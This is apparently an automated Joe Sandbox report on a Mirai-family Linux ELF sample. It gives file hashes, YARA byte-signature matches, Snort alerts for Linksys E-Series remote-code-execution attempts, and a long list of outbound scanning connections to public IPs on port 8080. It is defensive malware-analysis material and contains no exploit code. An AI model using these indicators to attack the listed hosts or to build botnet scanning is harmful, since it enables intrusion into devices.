Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
86O41HaCl5.elf

Overview

General Information

Sample name:86O41HaCl5.elf
renamed because original name is a hash value
Original sample name:77f6dbb4a1c2a1ca81d8f59fcc8f995d.elf
Analysis ID:1365651
MD5:77f6dbb4a1c2a1ca81d8f59fcc8f995d
SHA1:4ab8d151665d721c48f94c6b870c31b999a94152
SHA256:585014ced765a6632cd3ff845187e4c46d58955728e0ccd55952993500aa1642
Tags:32elfintelmirai
Infos:

Detection

Mirai
Score:84
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Machine Learning detection for sample
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Joe Sandbox version:38.0.0 Ammolite
Analysis ID:1365651
Start date and time:2023-12-21 17:03:57 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 49s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:86O41HaCl5.elf
renamed because original name is a hash value
Original Sample Name:77f6dbb4a1c2a1ca81d8f59fcc8f995d.elf
Detection:MAL
Classification:mal84.troj.linELF@0/0@0/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/86O41HaCl5.elf
PID:6214
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
love you ~jun0
Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 6281, Parent: 4331)
  • rm (PID: 6281, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.cQn9x2yAlZ /tmp/tmp.PRPRcDblVS /tmp/tmp.P0JqeoQ9qa
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
86O41HaCl5.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    86O41HaCl5.elfLinux_Trojan_Mirai_fa3ad9d0unknownunknown
    • 0x46a:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
    86O41HaCl5.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
    • 0x3a50:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
    86O41HaCl5.elfLinux_Trojan_Mirai_93fc3657unknownunknown
    • 0x4f5:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
    86O41HaCl5.elfLinux_Trojan_Mirai_804f8e7cunknownunknown
    • 0x39b:$a: 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F
    Click to see the 7 entries
    SourceRuleDescriptionAuthorStrings
    6216.1.0000000008048000.0000000008054000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      6216.1.0000000008048000.0000000008054000.r-x.sdmpLinux_Trojan_Mirai_fa3ad9d0unknownunknown
      • 0x46a:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      6216.1.0000000008048000.0000000008054000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
      • 0x3a50:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
      6216.1.0000000008048000.0000000008054000.r-x.sdmpLinux_Trojan_Mirai_93fc3657unknownunknown
      • 0x4f5:$a: 00 00 00 89 44 24 60 89 D1 31 C0 8B 7C 24 28 FC F3 AB 89 D1 8B 7C
      6216.1.0000000008048000.0000000008054000.r-x.sdmpLinux_Trojan_Mirai_804f8e7cunknownunknown
      • 0x39b:$a: 31 ED 81 E1 FF 00 00 00 89 4C 24 58 89 EA C6 46 04 00 C1 FA 1F
      Click to see the 19 entries
      Timestamp:192.168.2.23104.27.95.813962480802027153 12/21/23-17:04:45.062109
      SID:2027153
      Source Port:39624
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2335.201.98.2494600680802026102 12/21/23-17:05:08.065359
      SID:2026102
      Source Port:46006
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23146.19.80.2513499280802018132 12/21/23-17:04:52.215641
      SID:2018132
      Source Port:34992
      Destination Port:8080
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23175.225.155.124882680802018132 12/21/23-17:05:20.619925
      SID:2018132
      Source Port:48826
      Destination Port:8080
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23104.27.95.813962480802026102 12/21/23-17:04:45.062109
      SID:2026102
      Source Port:39624
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2345.60.57.2095761280802018132 12/21/23-17:05:20.862199
      SID:2018132
      Source Port:57612
      Destination Port:8080
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23166.168.54.1034030880802018132 12/21/23-17:04:59.832371
      SID:2018132
      Source Port:40308
      Destination Port:8080
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23166.168.54.1034030880802027153 12/21/23-17:04:59.832371
      SID:2027153
      Source Port:40308
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23175.225.155.124882680802027153 12/21/23-17:05:20.619925
      SID:2027153
      Source Port:48826
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2345.60.57.2095761280802027153 12/21/23-17:05:20.862199
      SID:2027153
      Source Port:57612
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.27.95.813962480802018132 12/21/23-17:04:45.062109
      SID:2018132
      Source Port:39624
      Destination Port:8080
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2345.60.57.2095761280802026102 12/21/23-17:05:20.862199
      SID:2026102
      Source Port:57612
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23175.225.155.124882680802026102 12/21/23-17:05:20.619925
      SID:2026102
      Source Port:48826
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23216.78.17.256078680802018132 12/21/23-17:05:03.323507
      SID:2018132
      Source Port:60786
      Destination Port:8080
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23166.168.54.1034030880802026102 12/21/23-17:04:59.832371
      SID:2026102
      Source Port:40308
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2386.115.3.2303869280802018132 12/21/23-17:04:59.818614
      SID:2018132
      Source Port:38692
      Destination Port:8080
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23136.41.4.755442680802018132 12/21/23-17:04:45.112267
      SID:2018132
      Source Port:54426
      Destination Port:8080
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2335.201.98.2494600680802018132 12/21/23-17:05:08.065359
      SID:2018132
      Source Port:46006
      Destination Port:8080
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23146.19.80.2513499280802026102 12/21/23-17:04:52.215641
      SID:2026102
      Source Port:34992
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23216.78.17.256078680802027153 12/21/23-17:05:03.323507
      SID:2027153
      Source Port:60786
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23216.78.17.256078680802026102 12/21/23-17:05:03.323507
      SID:2026102
      Source Port:60786
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23146.19.80.2513499280802027153 12/21/23-17:04:52.215641
      SID:2027153
      Source Port:34992
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23136.41.4.755442680802026102 12/21/23-17:04:45.112267
      SID:2026102
      Source Port:54426
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2386.115.3.2303869280802026102 12/21/23-17:04:59.818614
      SID:2026102
      Source Port:38692
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2386.115.3.2303869280802027153 12/21/23-17:04:59.818614
      SID:2027153
      Source Port:38692
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2335.201.98.2494600680802027153 12/21/23-17:05:08.065359
      SID:2027153
      Source Port:46006
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23136.41.4.755442680802027153 12/21/23-17:04:45.112267
      SID:2027153
      Source Port:54426
      Destination Port:8080
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 86O41HaCl5.elfAvira: detected
      Source: 86O41HaCl5.elfVirustotal: Detection: 64%Perma Link
      Source: 86O41HaCl5.elfReversingLabs: Detection: 75%
      Source: 86O41HaCl5.elfJoe Sandbox ML: detected

      Networking

      barindex
      Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:54426 -> 136.41.4.75:8080
      Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54426 -> 136.41.4.75:8080
      Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:54426 -> 136.41.4.75:8080
      Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:39624 -> 104.27.95.81:8080
      Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39624 -> 104.27.95.81:8080
      Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:39624 -> 104.27.95.81:8080
      Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:34992 -> 146.19.80.251:8080
      Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34992 -> 146.19.80.251:8080
      Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:34992 -> 146.19.80.251:8080
      Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:40308 -> 166.168.54.103:8080
      Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40308 -> 166.168.54.103:8080
      Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:40308 -> 166.168.54.103:8080
      Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:38692 -> 86.115.3.230:8080
      Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:38692 -> 86.115.3.230:8080
      Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:38692 -> 86.115.3.230:8080
      Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:60786 -> 216.78.17.25:8080
      Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60786 -> 216.78.17.25:8080
      Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:60786 -> 216.78.17.25:8080
      Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:46006 -> 35.201.98.249:8080
      Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46006 -> 35.201.98.249:8080
      Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:46006 -> 35.201.98.249:8080
      Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48826 -> 175.225.155.12:8080
      Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48826 -> 175.225.155.12:8080
      Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:48826 -> 175.225.155.12:8080
      Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:57612 -> 45.60.57.209:8080
      Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:57612 -> 45.60.57.209:8080
      Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:57612 -> 45.60.57.209:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 162.56.228.146:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 86.188.162.146:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 57.156.233.34:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 166.108.78.69:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 69.117.67.66:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 114.142.93.156:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 143.104.116.185:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 154.152.66.148:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 219.21.162.60:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 177.172.60.33:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 81.62.71.122:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 86.152.184.126:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 116.193.143.237:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 170.77.195.165:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 111.13.88.155:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 153.128.74.251:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 1.46.205.249:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 117.50.126.121:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 97.86.31.252:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 46.148.5.36:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 18.81.57.180:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 102.190.45.206:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 125.253.251.71:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 71.133.72.130:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 219.125.145.50:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 109.63.8.86:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 190.83.0.22:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 182.127.144.224:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 87.143.25.214:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 158.132.100.167:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 185.115.127.172:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 155.82.150.221:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 210.9.72.79:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 79.69.200.124:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 52.28.253.237:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 99.70.90.174:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 32.225.180.162:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 111.108.31.16:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 177.107.182.85:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 164.31.158.101:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 128.184.122.68:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 38.173.64.158:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 104.96.85.29:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 194.232.66.175:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 202.225.238.113:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 182.82.29.185:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 73.220.142.42:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 223.41.145.228:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 20.162.22.63:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 166.62.213.91:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 37.0.35.48:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 186.119.147.133:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 149.163.105.186:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 211.18.66.19:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 155.217.188.225:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 170.99.147.53:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 79.104.82.135:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 105.223.247.253:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 86.216.177.36:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 144.114.45.109:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 190.20.73.187:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 86.223.14.44:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 110.238.236.92:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 219.178.133.124:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 197.193.136.102:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 153.92.220.239:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 199.255.223.170:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 8.232.45.170:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 120.222.173.149:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 102.169.10.217:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 90.99.179.98:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 121.27.127.81:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 201.19.60.60:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 216.61.14.73:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 19.59.24.230:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 146.136.77.103:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 138.26.144.69:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 179.99.102.240:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 139.172.186.238:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 50.175.163.97:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 219.99.131.90:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 185.199.45.73:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 221.228.123.29:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 209.226.112.162:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 197.183.39.112:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 8.3.50.178:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 52.234.209.0:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 73.181.65.92:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 166.213.67.2:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 140.93.62.131:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 138.134.154.77:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 174.148.210.193:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 139.27.251.23:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 189.224.185.62:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 87.37.185.92:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 167.165.140.253:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 116.170.135.180:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 39.25.161.224:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 114.224.54.186:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 164.63.214.33:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 148.251.203.178:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 166.245.16.249:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 37.210.116.164:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 190.34.85.223:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 199.148.213.213:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 178.251.70.107:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 151.99.120.239:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 202.247.104.193:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 211.19.127.120:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 177.248.14.102:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 126.112.106.57:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 61.4.142.168:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 95.198.161.76:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 208.127.235.17:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 184.126.77.9:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 75.38.184.221:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 104.5.16.160:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 131.104.105.60:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 99.212.103.238:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 13.4.247.18:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 125.141.240.235:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 133.209.214.125:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 112.215.251.172:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 116.220.208.64:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 93.24.128.109:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 1.152.215.173:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 45.81.187.71:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 154.208.88.23:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 217.144.26.253:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 66.3.33.87:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 73.212.131.247:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 19.130.34.188:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 86.143.169.72:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 180.75.209.102:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 184.225.96.140:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 86.47.214.120:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 25.23.58.172:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 23.201.152.241:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 141.198.227.216:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 108.179.191.9:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 133.91.252.166:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 1.244.124.132:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 154.131.135.21:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 114.146.190.246:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 151.61.23.88:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 197.118.190.136:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 162.144.160.143:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 137.244.104.25:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 206.233.68.238:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 64.211.150.79:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 221.209.151.183:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 145.97.119.1:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 199.60.95.109:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 58.46.181.146:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 145.34.31.186:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 179.187.138.199:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 13.198.247.224:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 210.167.18.254:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 43.17.245.241:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 185.96.117.23:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 202.246.33.72:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 78.51.56.60:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 12.133.208.254:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 8.144.83.107:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 54.39.220.235:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 210.87.187.93:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 156.246.90.178:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 101.139.89.30:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 169.43.190.61:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 1.45.101.33:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 108.246.226.106:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 217.134.249.207:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 126.86.224.122:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 186.161.221.109:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 146.13.51.160:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 71.233.89.206:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 39.10.41.8:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 89.241.189.105:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 102.97.52.212:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 189.5.186.243:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 176.110.143.7:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 178.172.143.85:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 150.88.43.218:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 124.5.190.197:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 218.60.31.69:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 4.80.178.39:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 48.66.236.126:8080
      Source: global trafficTCP traffic: 192.168.2.23:49998 -> 92.70.244.220:8080
